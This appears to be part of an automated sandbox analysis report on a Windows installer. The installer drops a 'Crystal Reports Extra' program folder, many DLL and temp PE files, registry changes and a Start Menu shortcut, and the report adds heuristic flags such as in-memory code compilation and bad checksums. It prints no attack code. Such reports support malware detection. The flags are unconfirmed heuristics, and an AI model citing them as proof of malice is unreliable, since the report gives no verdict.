        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,1_2_004AF9F0
        Source: br4Cu3BycW.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
        Source: br4Cu3BycW.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: br4Cu3BycW.exeStatic file information: File size 5124457 > 1048576
        Source: br4Cu3BycW.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: Microsoft.ReportViewer.ProcessingObjectModel.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313356977.0000000005020000.00000004.00000001.sdmp
        Source: Binary string: D:\projects\capsa\output\x64_Release\pdb\tsharkdecode.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313634151.00000000052B7000.00000004.00000001.sdmp
        Source: Binary string: C:\lib\source\Programming\pdb\V\qt\YordansDev\SoftwareIdeasMod.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313356977.0000000005020000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000002.564667817.000000006E418000.00000002.00020000.sdmp
        Source: Binary string: C:\SharpShell\Antlr4\2016\brutal\qtbase\pdb\obj\ReportSource\InstallDir.pdb, source: br4Cu3BycW.tmp, 00000006.00000003.313835151.0000000005454000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000000.313157363.0000000000818000.00000002.00020000.sdmp
        Source: Binary string: C:\SharpShell\Antlr4\2016\brutal\qtbase\pdb\obj\ReportSource\InstallDir.pdb source: br4Cu3BycW.tmp, 00000006.00000003.313835151.0000000005454000.00000004.00000001.sdmp, CrystalReports.exe, 00000007.00000000.313157363.0000000000818000.00000002.00020000.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains in memory code executionShow sources
        Source: is-N95UU.tmp.6.dr, FileHelpers/RunTime/ClassBuilder.cs.Net Code: CompilerParametersGenerateInMemory(true) and CompilerParameters.GenerateExecutable(false)
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B5000 push 004B50DEh; ret 1_2_004B50D6
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B5980 push 004B5A48h; ret 1_2_004B5A40
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458000 push ecx; mov dword ptr [esp], ecx1_2_00458005
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049B03C push ecx; mov dword ptr [esp], edx1_2_0049B03D
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A00F8 push ecx; mov dword ptr [esp], edx1_2_004A00F9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458084 push ecx; mov dword ptr [esp], ecx1_2_00458089
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004B1084 push 004B10ECh; ret 1_2_004B10E4
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A1094 push ecx; mov dword ptr [esp], edx1_2_004A1095
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0041A0B4 push ecx; mov dword ptr [esp], ecx1_2_0041A0B8
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004270BC push 00427104h; ret 1_2_004270FC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458108 push ecx; mov dword ptr [esp], ecx1_2_0045810D
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004321C8 push ecx; mov dword ptr [esp], edx1_2_004321C9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A21D8 push ecx; mov dword ptr [esp], edx1_2_004A21D9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049E1B8 push ecx; mov dword ptr [esp], edx1_2_0049E1B9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049A260 push 0049A378h; ret 1_2_0049A370
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00455268 push ecx; mov dword ptr [esp], ecx1_2_0045526C
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004252D4 push ecx; mov dword ptr [esp], eax1_2_004252D9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004592FC push ecx; mov dword ptr [esp], edx1_2_004592FD
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0045B284 push ecx; mov dword ptr [esp], edx1_2_0045B285
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00430358 push ecx; mov dword ptr [esp], eax1_2_00430359
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00430370 push ecx; mov dword ptr [esp], eax1_2_00430371
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00459394 push ecx; mov dword ptr [esp], ecx1_2_00459398
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A1428 push ecx; mov dword ptr [esp], edx1_2_004A1429
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_0049B424 push ecx; mov dword ptr [esp], edx1_2_0049B425
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004A24D8 push ecx; mov dword ptr [esp], edx1_2_004A24D9
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004224F0 push 004225F4h; ret 1_2_004225EC
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_004304F0 push ecx; mov dword ptr [esp], eax1_2_004304F1
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00499490 push ecx; mov dword ptr [esp], edx1_2_00499493
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458564 push ecx; mov dword ptr [esp], edx1_2_00458565
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00458574 push ecx; mov dword ptr [esp], edx1_2_00458575
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeCode function: 1_2_00457574 push ecx; mov dword ptr [esp], ecx1_2_00457578
        Source: br4Cu3BycW.exeStatic PE information: section name: .didata
        Source: br4Cu3BycW.tmp.1.drStatic PE information: section name: .didata
        Source: br4Cu3BycW.tmp.5.drStatic PE information: section name: .didata
        Source: is-KTI9L.tmp.6.drStatic PE information: section name: /4
        Source: is-KTI9L.tmp.6.drStatic PE information: section name: .xdata
        Source: is-KTI9L.tmp.6.drStatic PE information: section name: /14
        Source: is-VO510.tmp.6.drStatic PE information: section name: .xdata
        Source: is-5P6B9.tmp.6.drStatic PE information: section name: /4
        Source: is-5P6B9.tmp.6.drStatic PE information: section name: .xdata
        Source: is-5P6B9.tmp.6.drStatic PE information: section name: /14
        Source: is-33ENG.tmp.6.drStatic PE information: section name: /4
        Source: is-33ENG.tmp.6.drStatic PE information: section name: .xdata
        Source: is-33ENG.tmp.6.drStatic PE information: section name: /14
        Source: is-FCT1V.tmp.6.drStatic PE information: section name: /4
        Source: is-FCT1V.tmp.6.drStatic PE information: section name: .xdata
        Source: is-FCT1V.tmp.6.drStatic PE information: section name: /14
        Source: is-TECE4.tmp.6.drStatic PE information: section name: /4
        Source: is-D43R5.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x1a0ba
        Source: br4Cu3BycW.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x315aa3
        Source: br4Cu3BycW.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x315aa3
        Source: is-7MTO8.tmp.6.drStatic PE information: real checksum: 0x4ae8ac should be: 0x4b55ab
        Source: is-Q7NRR.tmp.6.drStatic PE information: real checksum: 0x4351e8 should be: 0x4554a2
        Source: br4Cu3BycW.exeStatic PE information: real checksum: 0x0 should be: 0x4ec8cf
        Source: is-5P6B9.tmp.6.drStatic PE information: 0xA5E8A5E0 [Sat Mar 16 06:57:36 2058 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qjpeg4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qgif4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-1UL10.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-N95UU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-KTI9L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-GS64B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5P6B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-L6ITB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-HRO44.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libtasn1-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-7MTO8.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-FCT1V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\pthreadGC2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-TECE4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libssl-40.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\mingwm10.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-MMNOC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-AFSCM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-33ENG.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libmongoc-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgthread-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libbson-1.0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-B5IQO.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5F8P5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-0V44S.tmpJump to dropped file
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile created: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-OSEV1.tmpJump to dropped file
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeFile created: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-VO510.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\tsharkdecode.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgpg-error6-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-Q7NRR.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libnettle-4-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libffi-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crystal Reports ExtraJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crystal Reports Extra\Crystal Reports Extra.lnkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,3_2_005C90B4
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpCode function: 3_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,3_2_006A68B0
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,6_2_005C90B4
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpCode function: 6_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,6_2_006A68B0
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\br4Cu3BycW.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe TID: 5404Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qjpeg4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\qgif4.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-1UL10.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-KTI9L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libogg-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-N95UU.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\imageformats\is-GS64B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-5P6B9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-L6ITB.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-HRO44.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\libtasn1-6.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\pthreadGC2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-FCT1V.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-TECE4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\mingwm10.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-MMNOC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-AFSCM.tmpJump to dropped file
